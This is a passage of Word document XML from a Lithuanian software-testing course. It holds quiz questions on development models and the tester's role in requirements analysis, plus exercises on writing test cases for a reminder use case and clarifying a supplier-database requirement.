    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Jei mūsų projektas yra lab</w:t>
      </w:r>
      <w:r w:rsidR="00A56A39" w:rsidRPr="00AD4464">
        <w:t>ai</w:t>
      </w:r>
      <w:r w:rsidR="00D5034C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> svarbus ir turi grie</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>žtus, teisės aktais nustat</w:t>
      </w:r>
      <w:r w:rsidR="00E57830" w:rsidRPr="00AD4464">
        <w:t>ytus reikalavimus bei turės būti</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> audituojamas, kuris PĮ kūrimo modelis mums būtų palankesnis?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Krioklio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Agile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Spiralinis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A05C27" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>V-modelis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F72AC4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kokias </w:t>
      </w:r>
      <w:r w:rsidR="00752056" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">naudingas </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>įžva</w:t>
      </w:r>
      <w:r w:rsidR="00B64315" w:rsidRPr="00AD4464">
        <w:t>lgas testuotojas gali pateikti R</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>eikalavimų analizės procese?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F72AC4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojas gali pastebėti besidubliuoja</w:t>
      </w:r>
      <w:r w:rsidR="00E57830" w:rsidRPr="00AD4464">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>čius reikalavimus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F72AC4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Tes</w:t>
      </w:r>
      <w:r w:rsidR="00B64315" w:rsidRPr="00AD4464">
        <w:t>tuotojas gali pateikti papildomus klausimus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> dėl neapgalvotų scenarijų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B64315" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojas gali reikalau</w:t>
      </w:r>
      <w:r w:rsidR="00F72AC4" w:rsidRPr="00AD4464">
        <w:t>ti</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F72AC4" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> kad dokumentacija būtų paruošta išsamiai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F72AC4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojas gali pateikti įžvalgų dėl testuojamumo</w:t>
      </w:r>
      <w:r w:rsidR="00B64315" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> reikalavimų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F400A2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kuris iš žemiau pateiktų PĮ kūrimo modelių </w:t>
      </w:r>
      <w:r w:rsidR="00B64315" w:rsidRPr="00AD4464">
        <w:t>nenumato grįžimo į analizės fazę</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> kai Sistema jau sukurta?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F400A2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kriok</w:t>
      </w:r>
      <w:r w:rsidR="00B64315" w:rsidRPr="00AD4464">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>io</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F400A2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Agile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F400A2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Spiralinis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F400A2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>V-modelis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E58DB" w:rsidRPr="00AD4464" w:rsidRDefault="00DE6993" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokių yra panašumų tarp</w:t>
      </w:r>
      <w:r w:rsidR="00594A0E" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Agile (judriojo) ir iteratyvaus PĮ kūrimo modelių? Pakomentuokit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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE6993" w:rsidRPr="00AD4464" w:rsidTr="00000F7B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00DE6993"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DE6993" w:rsidRPr="00AD4464" w:rsidRDefault="00DE6993" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0002324C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc14392428"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Testuoti funkcinius reikalavimus ir naudoti juos testuojant programinę įrangą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AA36F7" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0032209D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0032209D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="0032209D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>FUNKCINIŲ REIKALAVIMŲ NAUDOJIMAS TESTUOJANT PROGRAMINĘ ĮRANGĄ</w:t>
      </w:r>
      <w:r w:rsidR="00EB31AB">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00356186" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Žemiau yra pateiktas </w:t>
      </w:r>
      <w:r w:rsidR="001A7C36" w:rsidRPr="00AD4464">
        <w:t>vartotojo reikalavimas sistemai:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> a) kokia tai reikalavimo forma? b) pateikite testavimo atvejų</w:t>
      </w:r>
      <w:r w:rsidR="001A7C36" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> sąrašą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> šiam reikalavimui ištestuoti</w:t>
      </w:r>
      <w:r w:rsidR="00EB31AB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001A7C36" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00357E13" w:rsidRPr="00AD4464">
        <w:t>: Išmokti naudoti User story ir Use case formatais aprašytus vartotojo reikalavimus testų kūrimui.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Peržiūrėti priminimą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tikslas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>: Pateikti naudotojui priminimą nustatytu laiku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">„Prieš“ </w:t>
      </w:r>
      <w:r w:rsidR="00AC3699" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sąlygos</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>: Yra sukurtas bent vienas užrašas, kuriam nustatytas priminimas. Šiuo metu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>yra laikas, nustatytas priminime, arba tas laikas jau yra praėjęs, bet priminimas dar nebuvo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>parodytas (pvz., nes programa buvo išjungta).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pagrindinis scenarijus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>1. Sistema pateikia naudotojui iššokantį langą su užrašo pavadinimu ir tekstu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>2. Naudotojas pasirenka uždaryti priminimą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>3. Sistema paslepia priminimo langą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>„Po“ sąlygos</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>: Priminimas buvo pateiktas naudotojui ir pažymėtas kaip peržiūrėtas. Priminimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B30992" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>daugiau nebus pateikiamas naudotojui, nebent tai yra pasikartojantis priminimas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AA36F7" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>„BACKLOG GROOMING“</w:t>
      </w:r>
      <w:r w:rsidR="00EB31AB">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000434A3" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pateikite sąrašą klausimų, kurie padėtų patikslinti vartotojo reik</w:t>
      </w:r>
      <w:r w:rsidR="001A7C36" w:rsidRPr="00AD4464">
        <w:t>alavimą sistemos funkcionalumui</w:t>
      </w:r>
      <w:r w:rsidR="00EB31AB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00EB31AB" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>UŽDUOTIES TIKSLAI</w:t>
      </w:r>
      <w:r w:rsidR="003A26FC" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001A7C36" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00E868F1" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Išsiaiškinti, kas tiksliai turi būti suprogramuota. </w:t>
      </w:r>
      <w:r w:rsidR="001A7C36" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00E868F1" w:rsidRPr="00AD4464">
        <w:t>Įsitikinti, kad reikalavimai yra aiškūs, vienareikšmiškai nusako, ką reikia įgyvendinti, nesidubliuoja, yra testuotini.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E868F1" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reikalavimas: Nr. 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E868F1" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aprašymas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00197D7B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistema turi leisti įtraukti į duomenų bazę informaciją apie tiekėjus.</w:t>
      </w:r>
      <w:r w:rsidR="00EF059E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E868F1" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pagrindimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00197D7B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Reikalinga saugoti informaciją apie tiekėjus iš kurių įsigytos prekės.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E868F1" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Šaltinis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00197D7B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sandėlininkas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E868F1" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:ind w:left="2596" w:hanging="2596"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tinkamumo kriterijus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>Sistemoje saugoma ir pajamuojant prekes panaudojama informacija apie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E868F1" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:ind w:left="2596" w:hanging="2596"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tiekėją.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E868F1" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Papildoma medžiaga</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>Gauta PVM sąskaita-faktūra</w:t>
      </w:r>
